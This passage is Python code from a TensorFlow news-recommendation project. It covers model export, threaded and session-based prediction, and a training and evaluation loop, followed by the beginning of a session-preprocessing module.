def save_sessions_negative_items(model_output_dir, sessions_negative_items_list, output_file='eval_sessions_negative_samples.json'):
append_lines_to_text_file(os.path.join(model_output_dir, output_file),
map(lambda x: json.dumps({'session_id': x['session_id'],
'negative_items': x['negative_items']}),
sessions_negative_items_list))
def save_sessions_chameleon_recommendations_log(model_output_dir, sessions_chameleon_recommendations_log_list,
eval_hour_id, output_file='eval_chameleon_recommendations_log.json'):
append_lines_to_text_file(os.path.join(model_output_dir, output_file),
map(lambda x: json.dumps({'eval_hour_id': eval_hour_id,
'session_id': x['session_id'],
'next_click_labels': x['next_click_labels'],
'predicted_item_ids': x['predicted_item_ids'],
'predicted_item_probs': x['predicted_item_probs'],
'predicted_item_norm_pop': x['predicted_item_norm_pop']
}),
sessions_chameleon_recommendations_log_list))
#Global vars updated by the Estimator Hook
clicked_items_state = None
eval_sessions_metrics_log = []
sessions_negative_items_log = [] if FLAGS.save_eval_sessions_negative_samples else None
sessions_chameleon_recommendations_log = [] if FLAGS.save_eval_sessions_recommendations else None
global_eval_hour_id = 0
import threading
from queue import Queue
from threading import Thread
#Export model for multithread predict
def export_model(estimator, export_dir):
def _serving_input_receiver_fn():
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
serialized_tf_example = tf.placeholder(dtype=tf.string, shape=None,
name='input_example_tensor')
# key (e.g. 'examples') should be same with the inputKey when you
# buid the request for prediction
receiver_tensors = {'examples': serialized_tf_example}
# features = tf.parse_example(serialized_tf_example,session_features_config)
features = parse_sequence_example_predict(serialized_tf_example, session_features_config)[0]
export_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(features)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
estimator.export_saved_model(export_dir,_serving_input_receiver_fn)
# Prediction using session
def get_session(exported_path):
sess = tf.Session()
pickle = ACR_Pickle_Singleton.getInstance()
tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], exported_path)
return sess
class FastClassifierThreaded():
def __init__(self, estimator,
threaded=True,
verbose=False):
"""
Parameters
----------
model_path: str
Location from which to load the model.
threaded: Boolean [True]
Whether to use multi-threaded execution for inference.
If False, the model will use a new generator for each sample that is passed to it, and reload the entire
model each time.
"""
# super(FlowerClassifierThreaded, self).__init__(model_path=model_path,
# verbose=verbose)
self.estimator = estimator
self.verbose = verbose
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
# Kill thread when true
self.killed = False
self.threaded = threaded
if self.threaded:
# We set the generator thread as daemon
# (see https://docs.python.org/3/library/threading.html#threading.Thread.daemon)
# This means that when all other threads are dead,
# this thread will not prevent the Python program from exiting
# print("ACTIVE NUM THREAD: %d" % (threading.active_count()))
self.prediction_thread = Thread(target=self.predict_from_queue, daemon=False, args=(lambda: self.killed, ))
# print("THREAD NAME: "+self.prediction_thread.getName())
self.prediction_thread.start()
else:
self.predictions = self.estimator.predict(input_fn=lambda: self.queued_predict_input_fn(lambda: self.killed))
# print("FastClassifierThread init success.")
def kill_thread(self):
self.killed = True
def generate_from_queue(self,stop):
""" Generator which yields items from the input queue.
This lives within our 'prediction thread'.
"""
while True:
try:
# print("KILLED: %r" % self.killed)
# print("STOPPED: %r" % stop())
# if self.killed:
# print("REMOVE THREAD")
# break
if stop():
# print("STOP THREAD")
return
yield
if self.verbose:
print('Yielding from input queue')
yield self.input_queue.get()
except Exception as e:
print("Err queue")
print(e)
yield ""
# finally:
# print("Error queue")
# self.input_queue.task_done()
def predict_from_queue(self,stop):
# print("THREAD ID: %d" %threading.current_thread().ident)
""" Adds a prediction from the model to the output_queue.
This lives within our 'prediction thread'.
Note: estimators accept generators as inputs and return generators as output. Here, we are
iterating through the output generator, which will be populated in lock-step with the input
generator.
"""
while not stop():
try:
for i in self.estimator.predict(input_fn=lambda: self.queued_predict_input_fn(stop)):
if self.verbose:
print('Putting in output queue')
self.output_queue.put(i)
print(stop())
print(stop)
if stop():
print("STOP THREAD OUTPUT")
# raise StopIteration
print("OUT FOR LOOP")
break
except Exception as ex:
print("Exception predict_from_queue")
print(ex)
raise
def predict(self, features):
"""
Overwrites .predict in FlowerClassifierBasic.
Calls either the vanilla or multi-threaded prediction methods based upon self.threaded.
Parameters
----------
features: dict
dict of input features, containing keys 'SepalLength'
'SepalWidth'
'PetalLength'
'PetalWidth'
Returns
-------
predictions: dict
Dictionary containing 'probs'
'outputs'
'predicted_class'
"""
try:
# Get predictions dictionary
# print("Into FastClassifierThreaded.predict() ")
# print(self.input_queue.qsize())
# print(self.output_queue.qsize())
if self.threaded:
# features = dict(features)
self.input_queue.put(features)
predictions = self.output_queue.get() # The latest predictions generator
else:
predictions = next(self.predictions)
# predictions = self.estimator.predict(input_fn=lambda: self.predict_input_fn(features))
# print("Prediction in FastClassifierThreaded.Predict() ")
# print(predictions)
# TODO: list vs. generator vs. dict handling
return predictions
except Exception as ex:
print("Exception predict func")
print(ex)
raise
def queued_predict_input_fn(self,stop):
"""
Queued version of the `predict_input_fn` in FlowerClassifier.
Instead of yielding a dataset from data as a parameter, we construct a Dataset from a generator,
which yields from the input queue.
"""
if self.verbose:
print("QUEUED INPUT FUNCTION CALLED")
# Fetch the inputs from the input queue
def _inner_input_fn():
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
return prepare_dataset_generator_predict(lambda: self.generate_from_queue(stop), session_features_config, batch_size=1,
truncate_session_length=FLAGS.truncate_session_length, predict_only=True)
return _inner_input_fn()
# tungtv Class Nar Model SingleTon For Predict
class NAR_Model_Predict(object,metaclass=Singleton):
__instance = None
lock = threading.Lock()
def __init__(self):
print("NAR Model Predict init ... ")
pickle = ACR_Pickle_Singleton.getInstance()
model_output_dir =pickle.model_nar_dir
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
self.content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
global clicked_items_state
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
self.content_article_embeddings_matrix.shape[0])
estimator = build_estimator(model_output_dir,
self.content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
# export_dir = model_output_dir+"exported/"
model_predict_path = model_output_dir + "exported/"
from os import path
if path.exists(model_predict_path):
pass
else:
os.makedirs(model_predict_path)
# create dir for each works
import random
from os import path
while True:
num = random.randint(1, 1000)
export_dir = model_predict_path + str(num) + '/'
if not path.exists(export_dir):
break
self.export_dir = export_dir
#Remove old files
# shutil.rmtree(export_dir)
export_model(estimator, self.export_dir)
# Get in subfolder of exported-model create
model_paths = glob.glob(export_dir+"*")
lastest = sorted(model_paths)[-1]
self.session = get_session(lastest)
#Load tensor for predict
self.load_tensor_from_session(self.session)
self.predict_fn = self.predict_from_expoted_model
#Load internal features
self.load_internal_features()
# print("NAR Model Predict build_estimator done")
#Add FastPred
# self.model = FastClassifierThreaded(estimator, verbose=True)
# print("Model = FastClassifierThread Done")
NAR_Model_Predict.__instance = self
def load_tensor_from_session(self,sess):
#Define output tensor
self.topk = sess.graph.get_tensor_by_name("main/recommendations_ranking/predicted_items/Reshape:0")
self.user_id = sess.graph.get_tensor_by_name("cond/Merge:0")
self.item_clicked = sess.graph.get_tensor_by_name("ExpandDims_5:0")
self.fetches = {"top_k_predictions":self.topk,"user_id":self.user_id,"item_clicked":self.item_clicked}
#Define features
self.examples = sess.graph.get_tensor_by_name("input_example_tensor:0")
self.recent_item_buffer = sess.graph.get_tensor_by_name("articles_status/pop_recent_items_buffer:0")
self.articles_recent_pop_norm = sess.graph.get_tensor_by_name("articles_status/articles_recent_pop_norm:0")
self.content_article_embeddings_matrix_ts = sess.graph.get_tensor_by_name("article_content_embeddings/content_article_embeddings_matrix:0")
# print("shape self.content_article_embeddings_matrix_ts")
# print(self.content_article_embeddings_matrix_ts.get_shape())
# articles_metadata0 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_0:0")
self.articles_metadata1 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_1:0")
self.articles_metadata2 = sess.graph.get_tensor_by_name("article_content_embeddings/articles_metadata_2:0")
def load_internal_features(self):
pickle = ACR_Pickle_Singleton.getInstance()
self.articles_features_config = get_articles_features_config(pickle.acr_label_encoders)
self.articles_metadata = process_articles_metadata(pickle.articles_metadata_df, self.articles_features_config)
@staticmethod
def getInstance():
if NAR_Model_Predict.__instance == None:
print("NAR singleton is none")
NAR_Model_Predict()
return NAR_Model_Predict.__instance
def predict_from_expoted_model(self, sess, news_id, guid):
# Get session and parse features from newsid, guid
parsed_example = parse_feature_to_string(news_id,guid)
# Offline local test
# recent_clicks = list(np.random.randint(low=1, high=2800, size=20000))
# recency = clicked_items_state.get_recent_pop_norm_for_predict(recent_clicks)
# Online gg services
# recent_clicks = get_list_id()
# encoded_list_id = []
# count = 0
#convert id to encoded id
pickle = ACR_Pickle_Singleton.getInstance()
# for id in recent_clicks:
# if(int(id) in pickle.acr_label_encoders['article_id']):
# encoded_list_id.append(pickle.get_article_id_encoded(int(id)))
# else:
# count = count +1
encoded_list_id = pickle.encoded_list_id
recency = clicked_items_state.get_recent_pop_norm_for_predict(encoded_list_id)
feed_dict={self.examples:parsed_example,self.recent_item_buffer:recency[1],
self.articles_recent_pop_norm:recency[0],
self.content_article_embeddings_matrix_ts:self.content_article_embeddings_matrix,
# articles_metadata0:articles_metadata['article_id'],
self.articles_metadata1:self.articles_metadata['created_at_ts'],
self.articles_metadata2:self.articles_metadata['category0']}
predictions = sess.run(self.fetches, feed_dict)
return predictions
# predictor = tf.contrib.predictor.from_saved_model(exported_path)
# input_tensor=tf.get_default_graph().get_tensor_by_name("input_example_tensor:0")
# output_dict= predictor({"examples":parsed_example})
# return output_dict
def getUpdateInstance(self):
print("===>NAR MODEL PREDICT UPDATE")
pickle = ACR_Pickle_Singleton.getInstance()
model_output_dir = pickle.model_nar_dir
# print("Model dir: {}".format(model_output_dir))
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
self.content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
# print("matrix: ")
# print(content_article_embeddings_matrix.shape[0])
# print("Shape self")
# print(self.content_article_embeddings_matrix.shape[0])
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
global clicked_items_state
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
self.content_article_embeddings_matrix.shape[0])
# print("NUM ITEMS CLICKED STATE: ")
# print(clicked_items_state.num_items)
estimator = build_estimator(model_output_dir,
self.content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
# print("Into NAR Model Update")
old_session = self.session
#Remove old files
# shutil.rmtree(export_dir)
for root, dirs, files in os.walk(self.export_dir):
for f in files:
os.unlink(os.path.join(root, f))
for d in dirs:
shutil.rmtree(os.path.join(root, d))
export_model(estimator, self.export_dir)
# Get in subfolder of exported-model create
model_paths = glob.glob(self.export_dir+"*")
lastest = sorted(model_paths)[-1]
session = get_session(lastest)
self.session = session
# Load tensor for predict
self.load_tensor_from_session(self.session)
self.predict_fn = self.predict_from_expoted_model
#Reload internal features for new session
self.load_internal_features()
#self.content_article_embeddings_matrix = content_article_embeddings_matrix
#Close old session
old_session.close()
print("UPDATE NAR MODEL PREDICT DONE")
# old_model = self.model
# #Add FastPred
# model = FastClassifierThreaded(estimator, verbose=True)
# # print("Start predict first time")
# self.model = model
# # print(model.prediction_thread)
# NAR_Model_Predict.__instance = self
# # Example predict for first time to load graph (avoid lazy load))
# predict("20190918203115156","reloadUser:0")
# # print("ReLoad NAR MODEL Predict done")
# # Kill old thread
# old_model.kill_thread()
# # print("Try to kill")
# dataset_parsed_string = parse_feature_to_string("20190918203115156","deleteUser:0")
# old_model.predict(dataset_parsed_string)
# # print(old_model.prediction_thread)
# try:
# old_model.prediction_thread.join()
# # print("CURRENT THREAD %s STATUS: %r" % (old_model.prediction_thread.getName(),old_model.prediction_thread.is_alive()))
# except Exception as e:
# print(e)
# raise
# # print("REMOVE current thread")
def load_model_for_predict():
pickle = ACR_Pickle_Singleton.getInstance()
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df,pickle.content_article_embeddings_matrix
content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
nar_label_encoders = \
NAR_Pickle_Singleton.getInstance()
session_features_config = get_session_features_config(nar_label_encoders)
return articles_features_config, content_article_embeddings_matrix, articles_metadata, session_features_config, acr_label_encoders, articles_metadata_df
#Parse function
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import numeric_scalers
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import preprocess_for_predict
def parse_feature_to_string(news_id, guid):
pickle = ACR_Pickle_Singleton.getInstance()
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
def get_article_text_length(article_id):
# article_id is str
# print("articale_id: {}".format(article_id))
# print(articles_metadata_df.dtypes)
if article_id == 0:
return numeric_scalers['text_length']['avg']
articles_metadata_df.set_index('article_id', inplace=False)
# text_length = articles_metadata_df.loc[article_id]['text_length']
text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
return text_length
dataset_parsed_string = preprocess_for_predict(guid,news_id,get_article_text_length)
return dataset_parsed_string
#Old Prediction function
# def predict(news_id, guid):
# try:
# pickle = ACR_Pickle_Singleton.getInstance()
# acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
# def get_article_text_length(article_id):
# # article_id is str
# # print("articale_id: {}".format(article_id))
# # print(articles_metadata_df.dtypes)
# from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import numeric_scalers
# if article_id == 0:
# return numeric_scalers['text_length']['avg']
# articles_metadata_df.set_index('article_id', inplace=False)
# # text_length = articles_metadata_df.loc[article_id]['text_length']
# text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
# return text_length
# # print("==================================>content_article_embeddings_matrix.shape[0]")
# # print(content_article_embeddings_matrix.shape[0])
# global clicked_items_state
# # clicked_items_state = ClickedItemsState(1.0,20000, 5000, content_article_embeddings_matrix.shape[0])
# clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
# FLAGS.recent_clicks_buffer_max_size,
# FLAGS.recent_clicks_for_normalization,
# content_article_embeddings_matrix.shape[0])
# clicked_items_state.reset_state()
# # model = get_estimator(model_output_dir, content_article_embeddings_matrix, articles_metadata,
# # articles_features_config, session_features_config)
# model = NAR_Model_Predict.getInstance().model
# from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import preprocess_for_predict
# start = time()
# dataset_parsed_string = preprocess_for_predict(guid,news_id,get_article_text_length)
# end = time()
# # print("PREPROCESS TIME:"+ str(-start+end))
# result = model.predict(dataset_parsed_string)
# # dataset = prepare_data_for_prediction(dataset,session_features_config)
# #a1 = lambda: prepare_data_for_prediction(dataset,session_features_config)
# #iter_pred = model.predict(input_fn=lambda: prepare_data_for_prediction(dataset,session_features_config,truncate_session_length=FLAGS.truncate_session_length))
# #print(iter_pred)
# # for pred_result in iter_pred:
# # print(pred_result)
# #a2 = lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
# # batch_size=FLAGS.batch_size,
# # truncate_session_length=FLAGS.truncate_session_length,predict_only=True)
# #training_files_chunk="/home/minh/VCC/newsrecomdeepneural/nardata/tmp/test.tfrecord.gz"
# # iter_pred2 = model.predict(input_fn=lambda: prepare_dataset_iterator(dataset_file_name, session_features_config,
# # batch_size=20,
# # truncate_session_length=FLAGS.truncate_session_length,predict_only=True))
# end = time()
# # for pred_result in iter_pred2:
# # print(pred_result)
# # print("COUNTER:")
# print("PREDICT TIME: %f "%(end-start))
# # print("LIST PREDICT:")
# # print(list(iter_pred2))
# # print("Predict success and Return values")
# return result
# except Exception as ex:
# tf.logging.error('ERROR: {}'.format(ex))
# raise
def predict(news_id,guid):
try:
model = NAR_Model_Predict.getInstance()
return model.predict_fn(model.session,news_id,guid)
except Exception as ex:
tf.logging.error('ERROR: {}'.format(ex))
raise
def get_estimator(model_output_dir, content_article_embeddings_matrix, articles_metadata,
articles_features_config, session_features_config):
return build_estimator(model_output_dir,
content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
def main(unused_argv):
try:
# pickle = ACR_Pickle_Singleton.getInstance()
# model_output_dir =pickle.model_nar_dir
# acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = pickle.acr_label_encoders, pickle.articles_metadata_df, pickle.content_article_embeddings_matrix
# content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1, 0.1))
# articles_features_config = get_articles_features_config(acr_label_encoders)
# articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
# nar_label_encoders = \
# NAR_Pickle_Singleton.getInstance()
# session_features_config = get_session_features_config(nar_label_encoders)
# global clicked_items_state
# clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
# FLAGS.recent_clicks_buffer_max_size,
# FLAGS.recent_clicks_for_normalization,
# content_article_embeddings_matrix.shape[0])
# clicked_items_state.reset_state()
# estimator = build_estimator(model_output_dir,
# content_article_embeddings_matrix, articles_metadata, articles_features_config,
# session_features_config)
# Old Pred, using threaded queue
print(predict("20190926084500472","2265891616712405988"))
# New Pred, export model -> using model to predict
# export_path = "/home/minh/VCC/newsrecomdeepneural/nardata/exported/serving"
# export_model(estimator, export_path)
# export_path = "/home/minh/VCC/newsrecomdeepneural/nardata/exported/serving/1571386208"
# a = predict_from_expoted_model("20190926084500472","ahuhu",export_path)
# print(a)
# start_time = time()
# a = predict("20190926084500472","2265891616712405988")
# end_time = time()
# print("COUNTER FULL: "+ str(-start_time+end_time))
# for i in range(5):
# print(i)
# print("-"*i)
# print(predict("20190926084500472","2265891616712405988"+str(i)))
# print("PRELOAD: "+ str(-end_time+time()))
# Capture whether it will be a single training job or a hyper parameter tuning job.
tf_config_env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = tf_config_env.get('task') or {'type': 'master', 'index': 0}
trial = task_data.get('trial')
running_on_mlengine = (len(tf_config_env) > 0)
print('Running {}'.format('on Google ML Engine' if running_on_mlengine else 'on a server/machine'))
#Disabling duplicate logs on console when running locally
logging.getLogger('tensorflow').propagate = running_on_mlengine
tf.logging.info('Starting training job')
gcs_model_output_dir = FLAGS.model_dir
#If must persist and load model ouput in a local cache (to speedup in ML Engine)
if FLAGS.use_local_cache_model_dir:
model_output_dir = tempfile.mkdtemp()
tf.logging.info('Created local temp folder for models output: {}'.format(model_output_dir))
else:
model_output_dir = gcs_model_output_dir
if trial is not None:
model_output_dir = os.path.join(model_output_dir, trial)
gcs_model_output_dir = os.path.join(gcs_model_output_dir, trial)
tf.logging.info(
"Hyperparameter Tuning - Trial {} - model_dir = {} - gcs_model_output_dir = {} ".format(trial, model_output_dir, gcs_model_output_dir))
tf.logging.info('Will save temporary model outputs to {}'.format(model_output_dir))
#If should warm start training from other previously trained model
if FLAGS.warmup_model_dir != None:
tf.logging.info('Copying model outputs from previous job ({}) for warm start'.format(FLAGS.warmup_model_dir))
dowload_model_output_from_gcs(model_output_dir,
gcs_model_dir=FLAGS.warmup_model_dir,
files_pattern=['graph.pb',
'model.ckpt-',
'checkpoint'])
local_files_after_download_to_debug = list(glob.iglob("{}/**/*".format(model_output_dir), recursive=True))
tf.logging.info('Files copied from GCS to warm start training: {}'.format(local_files_after_download_to_debug))
tf.logging.info('Loading ACR module assets')
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = \
load_acr_module_resources(FLAGS.acr_module_resources_path)
#Min-max scaling of the ACR embedding for a compatible range with other input features for NAR module
content_article_embeddings_matrix = min_max_scale(content_article_embeddings_matrix, min_max_range=(-0.1,0.1))
articles_features_config = get_articles_features_config(acr_label_encoders)
articles_metadata = process_articles_metadata(articles_metadata_df, articles_features_config)
tf.logging.info('Loading NAR module preprocesing assets')
nar_label_encoders=load_nar_module_preprocessing_resources(FLAGS.nar_module_preprocessing_resources_path)
session_features_config = get_session_features_config(nar_label_encoders)
tf.logging.info('Building NAR model')
global eval_sessions_metrics_log, sessions_negative_items_log, sessions_chameleon_recommendations_log, global_eval_hour_id
eval_sessions_metrics_log = []
clicked_items_state = ClickedItemsState(FLAGS.recent_clicks_buffer_hours,
FLAGS.recent_clicks_buffer_max_size,
FLAGS.recent_clicks_for_normalization,
content_article_embeddings_matrix.shape[0])
model = build_estimator(model_output_dir,
content_article_embeddings_matrix, articles_metadata, articles_features_config,
session_features_config)
tf.logging.info('Getting training file names')
train_files = resolve_files(FLAGS.train_set_path_regex)
if FLAGS.train_files_from > FLAGS.train_files_up_to:
raise Exception('Final training file cannot be lower than Starting training file')
train_files = train_files[FLAGS.train_files_from:FLAGS.train_files_up_to+1]
tf.logging.info('{} files where the network will be trained and evaluated on, from {} to {}' \
.format(len(train_files), train_files[0], train_files[-1]))
start_train = time()
tf.logging.info("Starting Training Loop")
training_files_chunks = list(chunks(train_files, FLAGS.training_hours_for_each_eval))
cur_time = time()
all_time = []
for chunk_id in range(0, len(training_files_chunks)-1):
training_files_chunk = training_files_chunks[chunk_id]
tf.logging.info('Training files from {} to {}'.format(training_files_chunk[0], training_files_chunk[-1]))
if FLAGS.prediction_only:
iter_pred = model.predict(input_fn=lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length,predict_only=True))
for pred_result in iter_pred:
pred_time = time()
dt =pred_time-cur_time
all_time.append(dt)
cur_time = pred_time
continue
model.train(input_fn=lambda: prepare_dataset_iterator(training_files_chunk, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length))
if chunk_id < len(training_files_chunks)-1:
#Using the first hour of next training chunck as eval
eval_file = training_files_chunks[chunk_id+1][0]
tf.logging.info('Evaluating file {}'.format(eval_file))
model.evaluate(input_fn=lambda: prepare_dataset_iterator(eval_file, session_features_config,
batch_size=FLAGS.batch_size,
truncate_session_length=FLAGS.truncate_session_length))
#After each number of train/eval loops
if chunk_id % FLAGS.save_results_each_n_evals == 0:
tf.logging.info('Saving eval metrics')
global_eval_hour_id += 1
save_eval_benchmark_metrics_csv(eval_sessions_metrics_log, model_output_dir,
training_hours_for_each_eval=FLAGS.training_hours_for_each_eval)
if FLAGS.save_eval_sessions_negative_samples:
#Flushing to disk the negative samples used to evaluate each sessions,
#so that benchmarks metrics outside the framework (eg. Matrix Factorization) can be comparable
save_sessions_negative_items(model_output_dir, sessions_negative_items_log)
sessions_negative_items_log = []
if FLAGS.save_eval_sessions_recommendations:
#Flushing to disk the recommended items to test re-ranking approaches (e.g. MMR)
save_sessions_chameleon_recommendations_log(model_output_dir,
sessions_chameleon_recommendations_log, global_eval_hour_id)
sessions_chameleon_recommendations_log = []
#Incrementing the eval hour id
global_eval_hour_id += 1
#If must persist and load model ouput in a local cache (to speedup in ML Engine)
if FLAGS.use_local_cache_model_dir:
tf.logging.info('Uploading cached results to GCS')
upload_model_output_to_gcs(model_output_dir, gcs_model_dir=gcs_model_output_dir,
#files_pattern=None)
files_pattern=[#'events.out.tfevents.',
'.csv', '.json'])
all_time = np.array(all_time, dtype=np.float)
print("Min %f s, max %f s, avg %f s" % (np.min(all_time), np.max(all_time), np.average(all_time)))
print(all_time)
tf.logging.info('Finalized Training')
if not FLAGS.prediction_only:
save_eval_benchmark_metrics_csv(eval_sessions_metrics_log, model_output_dir,
training_hours_for_each_eval=FLAGS.training_hours_for_each_eval)
if FLAGS.save_eval_sessions_negative_samples:
#Flushing to disk the negative samples used to evaluate each sessions,
#so that benchmarks metrics outside the framework (eg. Matrix Factorization) can be comparable
save_sessions_negative_items(model_output_dir, sessions_negative_items_log)
if FLAGS.save_eval_sessions_recommendations:
#Flushing to disk the recommended items to test re-ranking approaches (e.g. MMR)
save_sessions_chameleon_recommendations_log(model_output_dir, sessions_chameleon_recommendations_log, global_eval_hour_id)
tf.logging.info('Saved eval metrics')
#If must persist and load model ouput in a local cache (to speedup in ML Engine)
if FLAGS.use_local_cache_model_dir:
#Uploads all files to GCS
upload_model_output_to_gcs(model_output_dir, gcs_model_dir=gcs_model_output_dir,
files_pattern=None)
log_elapsed_time(start_train, 'Finalized TRAINING Loop')
except Exception as ex:
tf.logging.error('ERROR: {}'.format(ex))
raise
if __name__ == '__main__':
tf.app.run()
```
#### File: nar/preprocessing/nar_preprocess_cafebiz_2.py
```python
import argparse
import glob
import json
import os
import os.path
import re
import sys
from collections import Counter, defaultdict
from datetime import datetime
from os import path
import numpy as np
import pandas as pd
import tensorflow as tf
from acr_module.acr.acr_module_service import get_all_file, load_json_config
from nar_module.nar.tf_records_management import (make_sequential_feature,
save_rows_to_tf_record_file)
from nar_module.nar.utils import (deserialize, extract_local_hour_weekday,
gini_index, serialize)
# sys.path.append("/home/tungtv/Documents/Code/News/newsrecomdeepneural")
from pick_singleton.pick_singleton import ACR_Pickle_Singleton
from redis_connector.RedisClient import PageView, RedisClient, Session
sys.path.append("/data/tungtv/Code/NewsRecomDeepLearning")
# from ..tf_records_management import save_rows_to_tf_record_file, make_sequential_feature
# from ..utils import serialize, deserialize, hash_str_to_int, extract_local_hour_weekday, gini_index
def create_args_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_sessions_json_folder_path', default='',
help='Input path of the folder with sessions in JSON lines file, organized by hour (exported by the Spark script - nar_preprocessing_addressa_01_dataproc.ipynb).')
parser.add_argument(
'--input_acr_metadata_embeddings_path', default='',
help='Input path for a pickle with articles metadata and content embeddings, generated by ACR module.')
parser.add_argument(
'--input_nar_encoders_dict_path', default='',
help='Input path for a pickle with the dictionary encoders for categorical features (exported by the Spark script - nar_preprocessing_addressa_01_dataproc.ipynb)')
parser.add_argument(
'--number_hours_to_preprocess', type=int, default=-1,
help='Number of hours to preprocess')
parser.add_argument(
'--output_nar_preprocessing_resources_path', default='',
help='Output path for a pickle with label encoders and num scalers of clicks data.')
parser.add_argument(
'--output_sessions_tfrecords_path', default='',
help='Output path for TFRecords generated with user sessions')
return parser
def load_acr_module_resources(acr_module_resources_path):
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(acr_module_resources_path)
articles_metadata_df.set_index('article_id', inplace=False)
# articles_metadata_df.index = articles_metadata_df.index.astype(str)
def get_article_text_length(article_id):
# article_id is str
# print("articale_id: {}".format(article_id))
# text_length = articles_metadata_df.loc[article_id]['text_length']
if article_id == 0:
numeric_scalers['text_length']['avg']
text_length = articles_metadata_df[articles_metadata_df['article_id'] == article_id]['text_length'].values[0]
# print("text_length")
# print(text_length)
return text_length
def get_article_id_encoded(article_id):
return acr_label_encoders['article_id'][article_id]
#tf.logging.info("Read ACR label encoders for: {}".format(acr_label_encoders.keys()))
#article_id_label_encoder = acr_label_encoders['article_id']
return get_article_text_length, get_article_id_encoded
def load_nar_module_resources(nar_encoders_dict_path):
nar_encoders_dict = \
deserialize(nar_encoders_dict_path)
print("Read NAR label encoders dict for: {}".format(nar_encoders_dict.keys()))
return nar_encoders_dict
def load_sessions_json_file(json_path):
with open(json_path, 'r') as fi:
for line in fi:
yield json.loads(line)
def load_sessions_hour(session_hour_path):
sessions = []
for session_file in os.listdir(session_hour_path):
session_file_path = os.path.join(session_hour_path, session_file)
sessions_hour = load_sessions_json_file(session_file_path)
for session in sessions_hour:
sessions.append(session)
return sessions
def load_sessions_hours(folder_path):
#Sorting hours directories (treating cases where number of digits is lower. E.x. "session_hour=3" < "session_hour=20")
hour_folders = sorted([path for path in os.listdir(folder_path) \
if os.path.isdir(os.path.join(folder_path,path))],
key=lambda x: "{:0>5}".format(x.split('=')[1]))
for hour_folder in hour_folders:
hour_index = int(hour_folder.split('=')[1])
hour_folder_path = os.path.join(folder_path, hour_folder)
sessions_hour = load_sessions_hour(hour_folder_path)
yield (hour_index, sessions_hour)
numeric_scalers = {
'_elapsed_ms_since_last_click': {
#Set Maximum of 60 min, just to separate returning users, whose elapsed time since last click will be greater than the max 30-min limit for sessions
'valid_max': 60 * 60 * 1000.0,
'avg': 789935.7,
'stddev': 1371436.0},
'active_time_secs': {
'valid_max': 900.0,
'avg': 65.0,
'stddev': 69.37},
'active_time_secs_by_word': {
'valid_max': 10.0,
'avg': 1.854,
'stddev': 1.474},
'text_length':{
'avg':728
}
}
def standardize_num_feature(feature, values):
scaler_config = numeric_scalers[feature]
normalizer = lambda x: (min(int(x), scaler_config['valid_max']) - scaler_config['avg']) / scaler_config['stddev']
return list([normalizer(value) for value in values])
def get_cicled_feature_value(value, max_value):
value_scaled = (value + 0.000001) / max_value
